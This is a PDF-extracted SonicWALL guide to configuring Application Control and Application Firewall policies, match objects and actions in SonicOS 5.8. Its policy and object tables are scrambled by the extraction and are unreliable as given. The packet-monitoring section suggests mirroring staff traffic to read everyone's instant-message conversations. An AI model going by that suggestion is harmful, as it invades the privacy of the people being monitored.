Application Control / Application Firewall
in SonicOS Enhanced 5.8
Document Scope
This document describes how to configure and manage the Application Control and Application Firewall
features in SonicOS 5.8.
This document contains the following sections:
• “Application Control / Application Firewall Overview” on page 1
• “Licensing Application Control / Application Firewall” on page 25
• “Using Application Firewall and Application Control” on page 26
• “Useful Tools” on page 45
• “Use Cases” on page 52
• “Glossary” on page 80
Application Control / Application Firewall Overview
This section provides an introduction to the SonicOS 5.8 Ap plication Contro l and Application Fi rewall
features. This section contains the following subsections:
• “What are Application Control and Application Firewall?” on page 1
• “Benefits” on page 3
• “How Do Application Control and Application Firewall Work?” on page 4
• “Supported Platforms” on page 2 4
• “Supported Standards” on page 25
What are Application Control and Application Firewall?
In SonicOS 5.8, the Application Firewall feature of previous SonicOS releases has been significantly
enhanced with Application Control functionality. As part of this solution, the set of application relevant
signatures have been extracted from the existing set of IPS signatures and placed under the realm of the
Application Control feature. This change impacts the way that application control policies and dynamic
objects are configured and used.
Application Control and Application Firewall in SonicOS 5.8
#
Using Application Control
About Application Control
SonicOS 5.8 introduces a new user interface for application control with the new Firewall > App Rules
Advanced page. This screen provides a simple and direct way of configuring application control rules. You
can enable blocking or logging for a whole category of applications with one click, and can easily locate and
do the same for an individual application or individual signature. Once enabled, the category, application,
or signature is blocked or logged globally without the need to create an Application Firewall policy.
In SonicOS 5.8, all of the application configuration which was previously available under Security Services
> Intrusion Prevention is now moved to the App Rules Advanced page, leaving IPS to handle threats and
attacks. This change means that applications have their own user interface now, and you no longer have to
configure them under Intrusion Prevention.
For flexibility, Application Firewall policies can access the same application controls for any of the
categories, applications, or signatures available in the new App Rules Advanced page, giving you an
alternative method of controlling applications in your network. This alternative is provided on the Match
Objects page where you can create Application List objects, Application Category List objects, and
Application Signature List objects for use as match objects in an Application Firewall policy.
About Application Firewall
Application Firewall is a solution to configure policy r u les for applic ation signatures. As a set of
application-specific policies, it gives you granular control over network traffic on the level of users, email
users, schedules, and IP-subnets. The primary functionality of this application-layer access control feature
is to regulate Web browsing, file transfer, email, and email attachments.
Application Firewall’ s digital rights management component provides the ability to scan files and docum ents
for content and keywords. Using Application Firewall, you can restrict transfer of certain file names, file
types, email attachments, attachment types, email with certain subjects, and email or attachments with
certain keywords or byte patterns. You can deny inter nal or exter nal network access based on various
criteria.
Based on SonicWALL’s Deep Packet Inspection technology, Application Firewall also features intelligent
prevention functionality which allows you to create custom, policy-based actions. Examples of custom
actions include the following:
• Disabling an attachment
• Sending a custom block page
• Sending a custom email reply
• Redirecting an HTTP request
• Sending a custom FTP reply over an FTP control channel
• Bandwidth throttling for file types when using the HTTP or FTP protocols
While Application Firewall primarily provides appl icatio n level access control, application layer bandwidth
management and digital rights management functionality, it also includes the ability to create pure custom
IPS signatures. You can create a custom policy that matches any protocol you wish, by matching a unique
piece of the protocol header. See “Custom Signature” on page 74.
22
Application Control and Application Firewall in SonicOS 5.8
Benefits
Using Application Control
Application Firewall provides excellent functionality for preventing the accidental transfer of proprietary
documents. For example, when using the automatic address completion feature of Outlook Exchange, it is
a common occurrence for a popular name to complete to the wrong address. See Figure 1 for an example.
The Application Control functionality provides the following benefits:
• Application based configuration makes it easier to configure policies for application control. This was
difficult when the configuration was part of Intrusion Prevention in previous releases, which required
administrators to configure all the individual signatures of an application in order to block it or apply a
policy to it.
• The Application Control subscription service provides updated signatures as new attacks emerge.
• The related Application Intelligence functionality, as seen in App Flow Monitor and the Real Time
Visualization Monitor, is available upon registration as a 30-day free trial App Visualization license. This
allows any registered SonicWALL appliance to clearly display information about application traffic in
the network. Note that the feature must be enabled in the SonicOS management interface to become
active.
• Administrators can configure policy settings for individual signatures without influencing other
signatures of the same application.
• Application Control configuration screens are moved to the Firewall menu in the SonicOS management
interface, consolidating all Firewall and Application Control/Application Firewall access rules and
policies in the same area.
Application Firewall functionality can be compared to three main categories of products:
• Standalone proxy appliances
• Application proxies integrated into firewall VPN appliances
• Standalone IPS appliances with custom signature support
Standalone proxy appliances are typically desig ned to provide granular access control for a specific protocol.
SonicWALL Application Firewall provides granular, application level access control across multiple
protocols, including HTTP, FTP, SMTP , and POP3. Because Application Firewall runs on your SonicW ALL
firewall, you can use it to control both inbound and outbound traffic, unlike a dedicated proxy appliance
that is typically deployed in only one direction. Application Firewall provides better performance and
scalability than a dedicated proxy appliance because it is based on SonicWALL’s proprietary Deep Packet
Inspection technology.
Application Control and Application Firewall
21
Using Application Control
Today’s integrated application proxies do not provide granular, application level access control, application
layer bandwidth management, and digital rights management functionality. As with dedicated proxy
appliances, SonicWALL Application Firewall provides much higher performance and far greater scalability
than integrated application proxy solutions.
While some standalone IPS appliances provide protocol decoding support, none of these products supports
granular, application level access control, application layer bandwidth management, and digital rights
management functionality.
In comparing Application Firewall to SonicWALL Email Security, there are benefits to using either. Email
Security only works with SMTP, but it has a very rich policy space. Application Firewall works with SMTP,
POP3, HTTP, FTP and other protocols, is integrated into SonicOS on the firewall, and has higher
performance than Email Security. However, Application Firewall does not offer all the policy options for
SMTP that are provided by Email Security.
How Do Application Control and Application Firewall Work?
Application Control and Application Firewall utilize SonicOS Dee p Packet Inspection to scan application
layer network traffic as it passes through the gateway and locate content that matches configured application
signatures or keywords, either in text or binary content. When a match is found, these features perform the
configured action. When you configure Application Control directly, you create global rules that define
whether to block or log the application, which users, groups, or IP address ranges to include or exclude, and
a schedule for enforcement. When you configure Application Firewall, you create policies that define the
type of applications to scan, the direction, the content or keywords to match, optionally the user or domain
to match, and the action to perform.
The following sections describe the main components of Application Control and Application Firewall:
• “Application Control” on pag e 5
• “Application Firewall Policies” on page 6
• “Match Objects” on page 9
• “Action Objects” on page 19
• “Email Address Objects” on page 23
22
Application Control and Application Firewall in SonicOS 5.8
Application Control
The configuration method on the Firewall > App Rules Advanced page is completely different from creating
Application Firewall policies, and the settings you make here act like global policies and are independent
from any Application Firewall policy. Figure 2 s hows the Firewall > App Rules Advanced page.
Figure 2Firewall > App Rules Advanced Page
Using Application Control
You can configure the following settings on this page:
• Select a category, an application, or a signature.
• Select blocking, logging, or both as the action.
• Specify users, groups, or IP address ranges to include in or exclude from the action.
• Set a schedule for enforcing the controls.
While these application control settings are independent from Application Firewall policies, you can also
create application match objects for any of the categories, applications, or signatures available here, and use
those match objects in an Application Firewall policy. This allows you to use the wide array of actions and
other configuration settings available with Application Firewall. See the “Application List Objects” section
on page 15 for more infor mation about this policy-b ased user interface for application control.
The user interface and options on the Firewall > App Rules Advanced page are similar to those for
configuring Intrusion Prevention Service (IPS) on the Security Ser vices > Intr usion Prevention page. In
SonicOS 5.8, all of the application configuration which w as previously av ailable under IPS is no w mov ed to
application control, leaving IPS to handle threats and attacks. This change means that applications hav e their
own user interface now, and you no longer have to configure them under Intrusion Prevention. There are
some differences from the previous options, notably that the IPS configuration provided global settings,
categories, and signatures. In the new interface, there is no global level of configuration because there is no
priority for application control signatures. The new interface provides configuration options for categories,
applications, and signatures.
Application Control and Application Firewall
21
Using Application Control
Application Firewall Policies
You can use ApplicationFirewall to create custom policies to control specific aspects of traffic on your
network. A policy is a set of match objects, properties, and specific prevention actions.When you create a
policy, you first create a match object, then select and optionally customize an action, then reference these
when you create the policy.
In the Firewall > App Rules page, you can access the P olicy Settings screen, show n in Figure 3 for a P olicy
Type of SMTP Client. The screen changes depending on the Policy Type you select.
Figure 3Policy Settings screen
22
Some examples of policies include:
• Block applications for activities such as gambling
• Disable .exe and .vbs email attachments
• Do not allow the Mozilla browser on outgoing HTTP connections
• Do not allow outgoing email or MS Word attac h ments with the keywords “SonicWALL Confidential”,
except from the CEO and CFO
• Do not allow outgoing email that includes a graphic or watermark found in all confidential documents
When you create a policy, you select a policy type. Each policy type specifies the values or value types that
are valid for the source, destination, matc h object type, and action fields in the policy . You can further define
the policy to include or exclude specific users or groups, select a schedule, turn on logging, and specify the
connection side as well as basic or advanced directi on types . A basic direction type simply indicates inbound
or outbound. An advanced direction type allows zone to zone direction configuration, such as from the
LAN to the WAN.
Application Control and Application Firewall in SonicOS 5.8
Table 1 describes the characteristics of the available policy types.
Table 1Policy Types
Using Application Control
Policy
TypeDescription
App
Control
Content
Pol icy usin g
dynamic
Application
Control
related objects
for any
application
layer protocol
CFSPolicy for
content
filtering
Custom
Policy
Pol icy usin g
custom
objects for
any
application
layer protocol;
can be used to
create
IPS-style
custom
signatures
FTP Client Any FTP
command
transferred
over the FTP
control
channel
FTP Client
File
Upload
Request
An attempt to
upload a file
over FTP
(STOR
command)
FTP Client
File
Download
Request
An attempt to
download a
file over FTP
(RETR
command)
Valid
Source
Service /
Default
Valid
Destination
Service /
Default
Valid Match
Object Type
N/AN/AApplication
Category List,
Application
List,
Application
Signature List
N/AN/ACFS Categor y
List
Any / Any Any / AnyCustom
Object
Any / Any FTP Control
/ FTP
Control
FTP
Command,
FTP
Command +
Value, Custom
Object
Any / Any FTP Control
/ FTP
Filename, file
extension
Control
Any / Any FTP Control
/ FTP
Filename, file
extension
Control
Valid Action
Type
Reset/Drop,
Bypass DPI,
Packet Monitor,
Manage
Bandwidth, No
Action
CFS Block Page,
Packet Monitor,
Manage
Bandwidth, No
Action
Reset/Drop,
Bypass DPI,
Packet Monitor,
Manage
Bandwidth, No
Action
Reset/Drop,
Bypass DPI,
Packet Monitor,
No Action
Reset/Drop,
Bypass DPI,
Packet Monitor,
Manage
Bandwidth, No
Action
Reset/Drop,
Bypass DPI,
Packet Monitor,
Manage
Bandwidth, No
Action
Connection
Side
N/A
N/A
Client Side,
Server Side,
Both
Client Side
Client Side
Client Side
Application Control and Application Firewall
21
Using Application Control
Policy
TypeDescription
FTP Data
Transfer
Policy
Data
transferred
over the FTP
Data channel
HTTP
Client
Pol icy whic h
is applicable
to Web
browser
traffic or any
HTTP request
that originates
on the client
HTTP
Server
Response
originated by
an HTTP
Server
IPS
Content
Pol icy usin g
dynamic
Intrusion
Prevention
related objects
for any
application
layer protocol
POP3
Client
Pol icy to
inspect traffic
generat ed by a
POP3 client;
typically
useful for a
POP3 server
admin
Valid
Source
Service /
Default
Valid
Destination
Service /
Default
Valid Match
Object Type
Any / Any Any / AnyFile Content
Object
Any / Any Any / HTTP
(configurable
)
HTTP Host,
HTTP Cookie,
HTTP
Referrer,
HTTP
Request
Custom
Header,
HTTP URI
Content,
HTTP User
Agent, Web
Browser, File
Name, File
Extension
Custom
Object
Any /
HTTP
(configura
ble)
Any / AnyActiveX Class
ID, HTTP Set
Cookie, HTTP
Response
Custom
Header,
Custom
Object
N/AN/AIPS Signature
Category List,
IPS Signature
List
Any / Any POP3
(Retrieve
Custom
Object
Email) /
POP3
(Retrieve
Email)
Valid Action
Type
Reset/Drop,
Bypass DPI,
Packet Monitor,
No Action
Reset/Drop,
Bypass DPI,
Packet
Monitor*,
Manage
Bandwidth, No
Action
*Packet
Monitor action
not supported
for File Name
or File
Extension
Custom Object
Reset/Drop,
Bypass DPI,
Packet Monitor,
Manage
Bandwidth, No
Action
Reset/Drop,
Bypass DPI,
Packet Monitor,
Manage
Bandwidth, No
Action
Reset/Drop,
Bypass DPI,
Packet Monitor,
No Action
Connection
Side
Both
Client Side
Server Side
N/A
Client Side
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Policy
TypeDescription
POP3
Server
Pol icy to
inspect email
downloaded
from a POP3
server to a
POP3 client;
used for email
filtering
SMTP
Client
Pol icy appl ies
to SMTP
traffic that
originates on
the client
Valid
Source
Service /
Default
POP3
Valid
Destination
Service /
Default
Any / Any Email Body,
(Retrieve
Email) /
POP3
(Retrieve
Email)
Reset/Drop,
Disable
attachment,
Bypass DPI, no
action
Reset/Drop,
Block SMTP
E-Mail Without
Reply, Bypass
DPI, Packet
Monitor, No
Action
Connection
Side
Server Side
Client Side
Match Objects
Match objects represent the set of conditions which must be matched in order for actions to take place. This
includes the object type, the match type (exact, partial, prefix, or suffix), the input representation (text or
hexadecimal), and the actual content to match. Match objects were referred to as application objects in
previous releases.
Hexadecimal input representation is used to match binary content such as executable files, while text input
representation is used to match things like file or email content. You can also use hexadecimal input
representation for binary content found in a graphic image. Text input representation could be used to
match the same graphic if it contains a certain string in one of its properties fields.
The maximum size for a match object is 8192 (8K) byte s . Because Application Firewall matches data at wire
speeds, match objects do not provide matching for regular expressions. You can use a proxy server for this
functionality.
The File Content match object type provides a way to match a pattern within a compressed file. This type
of match object can only be used with FTP Data Transfer or SMTP Client Policies.
Application Control and Application Firewall
21
Using Application Control
Table 2 describes the suppor ted match object types.
Object TypeDescriptionMatch Types
ActiveX ClassIDClass ID of an
Application Category
List
Application ListAllows specification of
Application Signature
List
CFS Allow/Forbi dden
List
CFS Category ListAllows selection of one
Table 2Match Object Types
ExactNoNone
Active-X component.
For example, ClassID
of Gator Active-X
component is
“c1fb8842-5281-45cea271-8fd5f117ba5f ”
Allows specification of
N/ANoNone
application categories,
such as Multimedia.,
P2P, or Social
Networking
N/ANoNone
individual applications
within the application
category that you
select
Allows specification of
N/ANoNone
individual signatures
for the application and
category that you
select
Allows specification of
allowed and forbidden
Exact, Partial,
Prefix, Suffix
domains for Content
Filtering
N/ANoA list of 64 categories
or more Content
Filtering categories
Negative
MatchingExtra Properties
NoNone
is provided to choose
from
22
Application Control and Application Firewall in SonicOS 5.8
Object TypeDescriptionMatch Types
Custom ObjectAllows specification of
ExactNoThere are 4 additional,
an IPS-style custom set
of conditions.
Email BodyAny content in the
PartialNoNone
body of an email.
Email CC (MIME
Header)
Email From (MIME
Header)
Email SizeAllows specification of
Any content in the CC
MIME Header.
Any content in the
From MIME Header.
Exact, Partial,
Prefix, Suffix
Exact, Partial,
Prefix, Suffix
N/ANoNone
the maximum email
size that can be sent.
Email Subject (MIME
Header)
Email To (MIME
Header)
MIME Custom Header Allows for creation of
Any content in the
Subject MIME Header.
Any content in the To
MIME Header.
MIME custom
Exact, Partial,
Prefix, Suffix
Exact, Partial,
Prefix, Suffix
Exact, Partial,
Prefix, Suffix
headers.
File ContentAllows specification of
PartialNo‘Disable attachment’
a pattern to match in
the content of a file.
The pattern will be
matched even if the file
is compressed.
Using Application Control
Negative
MatchingExtra Properties
optional parameters
that can be set: offset
(describes from what
byte in packet payload
we should start
matching the pattern –
starts with 1; helps
minimize false
positives in matching),
depth (describes at
what byte in the packet
payload we should
stop matching the
pattern – starts with
1), minimum payload
size and maximum
payload size.
YesNone
YesNone
YesNone
YesNone
YesA Custom header
name needs to be
specified.
action should never be
applied to this object.
Application Control and Application Firewall
21
Using Application Control
Object TypeDescriptionMatch Types
FilenameIn cases of email, this
Filename ExtensionIn cases of email, this
FTP CommandAllows selection of
FTP Command +
Value
HTTP Cookie HeaderAllows specification of
HTTP Host HeaderContent found inside
HTTP Referrer
Header
is an attachment name.
In cases of HTTP, this
is a filename of an
uploaded attachment
to the Web mail
account. In cases of
FTP, this is a filename
of an uploaded or
downloaded file.
is an attachment
filename extension. In
cases of HTTP , this is a
filename extension of
an uploaded
attachment to the Web
mail account. In cases
of FTP, this is a
filename extension of
an uploaded or
downloaded file.
specific FTP
commands.
Allows selection of
specific FTP
commands and their
values.
a Cookie sent by a
browser.
of the HTTP Host
header. Represents
hostname of the
destination server in
the HTTP request,
such as
www.google.com.
Allows specification of
content of a Referrer
header sent by a
browser – this can be
useful to control or
keep stats of which
Web sites redirected a
user to customer’ s W eb
site.
Negative
MatchingExtra Properties
Exact, Partial,
YesNone
Prefix, Suffix
ExactYesNone
N/ANoNone
Exact, Partial,
YesNone
Prefix, Suffix
Exact, Partial,
YesNone
Prefix, Suffix
Exact, Partial,
YesNone
Prefix, Suffix
Exact, Partial,
YesNone
Prefix, Suffix
22
Application Control and Application Firewall in SonicOS 5.8
Object TypeDescriptionMatch Types
HTTP Request
Custom Header
Allows creation of
custom HTTP Request
Exact, Partial,
Prefix, Suffix
headers.
HTTP Response
Custom Header
Allows creation of
custom HTTP
Exact, Partial,
Prefix, Suffix
Response headers.
HTTP Set Cookie
Header
Set-Cookie headers.
Provides a way to
Exact, Partial,
Prefix, Suffix
disallow certain
cookies to be set in a
browser.
HTTP URI ContentAny content found
inside of the URI in
Exact, Partial,
Prefix, Suffix
the HTTP request.
HTTP User-Agent
Header
Any content inside of a
User-Agent header.
Exact, Partial,
Prefix, Suffix
For example:
User-Agent: Skype.
Web BrowserAllows selection of
N/AYesNone
specific Web browsers
(MSIE, Netscape,
Firefox, Safari,
Chrome).
IPS Signature Category
List
Allows selection of one
or more IPS signature
N/ANoNone
groups. Each group
contains multiple
pre-defined IPS
signatures.
IPS Signature ListAllows selection of one
N/ANoNone
or more specific IPS
signatures for
enhanced granularity.
Using Application Control
Negative
MatchingExtra Properties
YesA Custom header
name needs to be
specified.
YesA Custom header
name needs to be
specified.
YesNone
NoNone
YesNone
Application Control and Application Firewall
21
Using Application Control
You can see available match object types in a drop-down list in the Match Object Setting screen:
Negative Matching
In the Match Object screen, you can add multiple entries to create a list of content elements to match. All
content that you provide in a match object is case-insensitive for matching purposes. A hexadecimal
representation is used to match binary content. You can use a hex editor or a network protocol analyzer lik e
Wireshark to obtain hex format for binary files. For more information about these tools, see the following
sections:
• “Wireshark” on page 45
• “Hex Editor” on page 48
You can use the Load From File button to import content from predefined text files that contain multiple
entries for a match object to match. Each entry in the file must be on its own line. The Load From File
feature allows you to easily move Application Firewall settings from one SonicWALL security appliance to
another.
Multiple entries, either from a text file or entered manually, are displayed in the List area. List entries are
matched using the logical OR, so if any item in the list is matched, the action for the policy is executed.
A match object can include a total of no more than 8000 characters. If each element within a match object
contains approximately 30 characters, then you can enter about 260 elements. The maximum element size
is 8000 bytes.
Negative matching provides an alternate way to specify which content to block. You can enable negative
matching in a match object when you want to block everything except a particular type of content. When
you use the object in a policy, the policy will execute actions based on absence of the content specified in
the match object. Multiple list entries in a negative matching object are matched using the logical AND,
meaning that the policy action is executed only when all specified negative matching entries are matched.
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Although all Application Firewall policies are DENY pol icies, you can simulate an ALLOW policy by using
negative matching . For instance, you can allow email .txt attachments and block attachments of all other file
types. Or you can allow a few types, and block all others.
Not all match object types can utilize negative matching . For those that can, y ou will see the Enable Negative
Matching checkbox on the Match Object Settings screen.
Figure 4Enable Negative Matchi ng Checkbox
Application List Objects
The Firewall > Match Objects page also contains the Add Application List Object button, which opens
the Create Filter Object screen. This screen provides three tabs:
• Security – You can set a Security Level Filter on this tab.
• Category – You can create a category filter object on this tab. A list of application cate gories and their
descriptions are provided. The Category page offers another way to create a match object of the
Application Category List type.
• Application – You can create an Application Filter Object on this tab. This screen allows selection of
the application category, threat level, type of technology, and attributes. After selections are made, the
list of applications matching those criteria is displayed. The Application tab provides another way to
create a match object of the Application List type.
Application Control and Application Firewall
21
Using Application Control
Security Level Filters
The Security tab provides a “slider” that represents the general level of application security and control
maintained by the firewall. The setting, or profile, you choose affects the ability of the firewall to make
important decisions about blocking or managing the bandwidth of applications, based on your preferences
for the level of application control. Figure 5 shows the slider in the Normal setting.
Figure 5Security Tab
Each profile (Strict, Normal, and Loose) defines an action for each application, either to block, allow, or
manage bandwidth for it. The respective predefined actions are automatically applied to those applications
in accordance with the selected profile. When None is selected, there is no application control except for
the policies you configure.
You can choose between four levels of application security:
• None – The firewall makes no decisions on application level security policies and you ha v e full man ual
control over the rules and signatures.
• Loose – The firewall makes some decisions on traffic control by blocking obviously dangerous
applications and doing light management for bandwidth heavy applications.
• Normal – The firewall makes decisions on traffic control by blocking obviously dangerous applications
and doing some management of bandwidth medium and bandwidth heavy applications.
• Strict – The firewall blocks all dangerous and suspicious application traffic, and imposes bandwidth
control to provide optimal policies for strict security environments.
The page provides a Save Se c u r it y L e vel F i lt e r button to save your setting.
22
Application Control and Application Firewall in SonicOS 5.8
Category Filters
Using Application Control
The Category tab provides a list of application categories for selection. Y ou can select any combination of
categories and then save your selections as a category filter object with a custom name. Figure 6 shows the
screen with the description of the IM category displayed.
Figure 6Category Tab
Application Filters
Y ou can hover y our mouse pointer ov er each category in the list to see a description of it. T o create a custom
category filter object, simply type in a name for the object in the Object Name field, select one or more
categories, and click the Save Category Filter button. You will see the object name listed on the Firewall
> Match Objects page with an object type of Application Category List. This object can then be selected
when creating an Application Firewall policy.
The Application tab provides a list of applications for selection. You can control which applications are
displayed by selecting one or more application categories, threat levels, and technologies. When the
application list is reduced to a list that is focussed on your preferences, you can select the individual
Application Control and Application Firewall
21
Using Application Control
applications for your filter and then save your selections as an application filter object with a custom name.
Figure 7 shows the screen with all categories, threat levels, and technologies selected, but before any
individual applications have been chosen.
Figure 7Application Tab
As you select the applications for your filter, they appear in the Application Group field on the right. You
can edit the list in this field by deleting individual items or b y clic king the er aser to delete all items. Figure 8
shows several applications in the Application Group field. The selected applications are also marked with
a green checkmark icon in the application list on the left side.
Figure 8Application Group
When finished selecting the applications to include, you can type in a name for the object in the Object
Name field and click the Save Application Filter button. You will see the object name listed on the
Firewall > Match Objects page with an object type of Application List. This object can then be selected
when creating an Application Firewall policy.
22
Application Control and Application Firewall in SonicOS 5.8
Action Objects
Using Application Control
Action Objects define how the Application Firewall policy reacts to matching events. Yo u can choose a
customizable action or select one of the predefined, default actions.
The predefined actions are:
• Block SMTP Email Without Reply
• BWM High
• BWM Low
• BWM Medium
• Bypass DPI
• CFS block page
• No Action
• Packet Monitor
• Rese t / Drop
The customizable actions are:
• Block SMTP Email - Send Error Reply
• Disable Email Attachment - Add Text
• Email - Add Text
• FTP Notification Reply
• HTTP Block Page
• HTTP Redirect
• Bandwidth Management
See Tab le 3 for descriptions of these action types.
Note that only the customizable actions are available for editing in the Action Object Settings window,
shown in Figure 9. The predefined actions cannot be edited or deleted. When you create a policy, the Policy
Settings screen provides a way for you to select from the predefined actions along with any customized
actions that you have defined.
Figure 9Action Object Settings
Application Control and Application Firewall
21
Using Application Control
Table 3 describes the available action types.
Action TypeDescription
Block SMTP Email Without
Reply
BWM HighManages inbound and outbound bandwidth, guarantees a
BWM LowManages inbound and outbound bandwidth, guarantees a
BWM MediumManages inbound and outbound bandwidth, guarantees a
Bypass DPIBypasses Deep Packet Inspection components IPS, GAV,
CFS block pageBlocks access to the Web p age and displays a pre-formatted
No ActionPolicies can be specified without any action. This allo ws “log
Packet MonitorUse the SonicOS Packet Monitor capability to capture the
Reset / DropFor TCP, the connection will be reset. For UDP, the packet
Table 3Action Types
Blocks SMTP email, but to the sender it looks like email was
successfully sent.
high level of bandwidth availability defined as 90% of total
available bandwidth, allows high bandwidth usage up to a
maximum of 90% of total available bandwidth
2
priority of zero
, and enables bandwidth usage tracking. You
can view these settings and the usage in th e Action
Properties tooltip by mousing over the BWM action of a
policy on the Firewall > App Rules page.
low level of bandwidth availability defined as 20% of total
available bandwidth, allows bandwidth usage up to a
maximum of 20% of total available bandwidth
2
priority of zero
, and enables bandwidth usage tracking. Y ou
can view these settings and the usage in th e Action
Properties tooltip by mousing over the BWM action of a
policy on the Firewall > App Rules page.
medium level of bandwidth availability defined as 50% of
total available bandwidth, allows bandwidth usage up to a
maximum of 50% of total available bandwidth
2
priority of zero
, and enables bandwidth usage tracking. Y ou
can view these settings and the usage in th e Action
Properties tooltip by mousing over the BWM action of a
policy on the Firewall > App Rules page.
Anti-Spyware and Application Firewall. This action persists
for the duration of the entire connection as soon as it is
triggered. Special ha ndling is applied to FTP co ntrol
channels that are never bypassed for Application Firewall
inspection. This action supports proper handling of the FTP
data channel. Note that Bypass DPI does not stop filters that
are enabled on the Firewall Settings > SSL Control page.
‘blocked content’ page.
only” policy types.
inbound and outbound packets in the session, or if mirroring
is configured, to copy the packets to another interface. The
capture can be viewed and analyzed with Wireshark.
will be dropped.
1
; sets a
1
; sets a
1
; sets a
Predefined
or Custom
Predefined
Predefined
Predefined
Predefined
Predefined
Predefined
Predefined
Predefined
Predefined
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Predefined
Action TypeDescription
Block SMTP Email - Send
Error Reply
Disable Email Attachment Add Text
Blocks SMTP email and notifies the sender with a
customized error message.
Disables attachment inside of an email and adds customized
text.
or Custom
Custom
Custom
Email - Add TextAppends custom text at the end of the email.Custom
FTP Notification ReplySends text back to the client over the FTP control channel
Custom
without terminating the connection.
HTTP Block PageAllows a custom HTTP block page configuration with a
Custom
choice of colors.
HTTP RedirectProvides HTTP Redirect functionality. For example, if
Custom
someone would like to redirect people to the Google Web
site, the customizable part will look like:
http://www.g oogle.com
If an HTTP Redirect is sent from Application Control to a
browser that has a form open, the infor mation in the form
will be lost.
Bandwidth ManagementAllows definition of bandwidth management constraints
Custom
with same semantics as Access Rule BWM policy definition.
1. Total available bandwidth is defined by the values entered for Available Interface Egress/Ingress Bandwidth when configuring
the WAN interface from the Network > Interfaces page. See “Configuring Bandwidth Management on an Interface” section on
page 40 for more information.
2. Note that while a setting of zero is the high est prio rity, priority is not used when bandwidth manageme nt is ena bled.
Application Layer Bandwidth Management
Application layer bandwidth management (BWM) allows you to create policies that regulate bandwidth
consumption by specific file types within a protocol, while allowing other file types to use unlimited
bandwidth. This enables you to distinguish between desirable and undesirable traffic within the same
protocol. Application layer bandwidth management is supported for HTTP Client, HTTP Server, Custom,
and FTP file transfer policies. For details about policy types, see Table 1 on page 7.
For example, as an administrator you might want to limit .mp3 and executable file downloads during wo rk
hours to no more than 1 Mbps. At the same time, you w ant to allow downloads of prod uctiv e file types suc h
as .doc or .pdf up to the maximum available bandwidth, or even give the highest possible priority to
downloads of the productive content. As another example, you might want to limit bandwidth for a certain
type of peer-to-peer (P2P) traffic, but allow other types of P2P to use unlimited bandwidth. Application
layer bandwidth management allows you to create policies to do this.
Application layer bandwidth management functionality is supported with three predefined BWM actions
(High, Medium, and Low) available when adding a policy from the Firewall > App Rules page, and a
customizable Bandwidth Management type action, available when adding a new action from the Firewall >
Action Objects screen.
When configuring a Bandwidth Management action, you can select either Per Ac t io n or Pe r Po l ic y, as
shown in Figure 10. Per Action means that when you create a limit of 10 Mbps in an Action Object, and
three different policies use the Action Object, then each policy can consume up to 10 Mbps of bandwidth.
Application Control and Application Firewall
21
Using Application Control
Per P olicy means that the three pol icies combined can only use 10 Mbps. The predefined BWM High, BWM
Medium, and BWM Low actions are all Per Action. In releases previous to SonicOS 5.8, all Bandwidth
Management actions were automatically set to Per Policy, but now you have a choice.
Figure 10Per Action or Per Policy Bandwidth Management
NoteBandwidth management policies defined with Firewall > Access Rules always have priority
Packet Monitoring
Application layer bandwidth management configuration is handled in the same way as the Ethernet
bandwidth management configuration associated with Firewall > Access Rules. However, with Application
Firewall you can specify all content type, which you cannot do with access rules.
over application layer bandwidth management policies. Thus, if an access rule bandwidth
management policy is applied to a certain connection, then an application layer bandwidth
management policy will never be applied to that connection.
When the predefined Packet Monitor action is set for a policy, SonicOS will capture or mirror the traffic
according to the settings you have configured on the System > Pack et Monitor page. The default is to create
a capture file, which you can view with Wireshark.
To customize the action, you can click Configure on the System > Packet Monitor page and select Enable Filter based on firewall rule on the Monitor Filter tab. This works for both Application Firewall policies
and for Firewall Access Rules, and allows you to specify configuration or filtering for what to capture or
mirror. You can download the capture in different for mats and look at in a Web page, for example.
To set up mirroring, go to the Mirror tab and pick an interface to which to send the mirrored traffic in the
Mirror filtered packets to Interface (NSA platforms only) field under Local Mirroring Settings. Y ou can
also configure one of the Remote settings. This allows you to mirror the application packets to another
computer and store everything in the hard disk. For example, you could capture everyone’s MSN Instant
Messenger traffic and read the conversations.
See the SonicOS Administrator’s Guide for more infor matio n about configuring the Packet Monitor feature,
available at:
http://www.sonicwall.com/us/Support.html
22
Application Control and Application Firewall in SonicOS 5.8
Email Address Objects
Application Firewall allows the creation of custom email address lists as email address objects . You can only
use email address objects in an SMTP client policy configuration. Email address objects can represent either
individual users or the entire domain. You can also create an email address object that represents a group
by adding a list of individual addresses to the object. This provides a wa y to easily include or ex clude a group
of users when creating an SMTP client policy.
For example, you can create an email address object to represent the support g roup:
Figure 11Email Address Object
Using Application Control
After you define the group in an email address object, you can create an SMTP client policy that includes
or excludes the group.
Application Control and Application Firewall
21
Using Application Control
In Figure 12, the settings exclude the support group from a policy that prevents executable fi les from bei ng
attached to outgoing email. You can use the email user object in either the MAIL FROM or RCPT TO fields
of the SMTP client policy. The MAIL FROM field refers to the sender of the email. The RCPT TO field
refers to the intended recipient.
Figure 12SMTP Client Policy
Although Application Control cannot extract group members directly from Outlook Exchange or similar
applications, you can use the member lists in Outlook to create a text file that lists the group members. Then
when you create an email address object for this group, you can use the Load From File button to import
the list from your text file. Be sure that each email address is on a line by itself in the text file.
Supported Platforms
Application Control and Application Firewall are currently available in SonicOS 5.8 on the following
appliance models:
• SonicWALL NSA E8500
• SonicWALL NSA E7500
• SonicWALL NSA E6500
• SonicWALL NSA E5500
• SonicWALL NSA 5000
• SonicWALL NSA 4500
22
Application Control and Application Firewall in SonicOS 5.8
• SonicWALL NSA 3500
• SonicWALL NSA 2400
• SonicWALL NSA 240
The configuration maximums vary depending on the hardware model, with typical ranges of 50 to 300 each
for policies, actions, match objects, and email address objects.
Supported Standards
The SonicOS Application Control feature supports the following protocols and standards:
• HTTP
• FTP
• SMTP
• POP3
• MIME
• Other protocols - generic TCP streams and UDP packet inspection
You can match any protocol by creating a custom match object.
Using Application Control
Licensing Application Control / Application Firewall
Application Intelligence and Con trol has two components:
• The Intelligence component is associated with the App Visualization and App Flow Monitor features
in SonicOS 5.8.
• The Control component, including Application Firewall and Application Control, is licensed separately
as are other security services such as SonicWALL Gateway Anti-Virus (GAV ), Intr usion Prevention
Service (IPS), and Anti-Spyware.
In SonicOS 5.8, the Intelligence/Visualization component provides identification and reporting of
application traffic on the Visualization Dashboard. Upon registration on MySonicW ALL, or when you load
SonicOS 5.8 onto a registered SonicWALL device, supported SonicWALL appliances receive an automatic
30-day trial license for App Visualization, and application signatures are downloaded to the appliance . Once
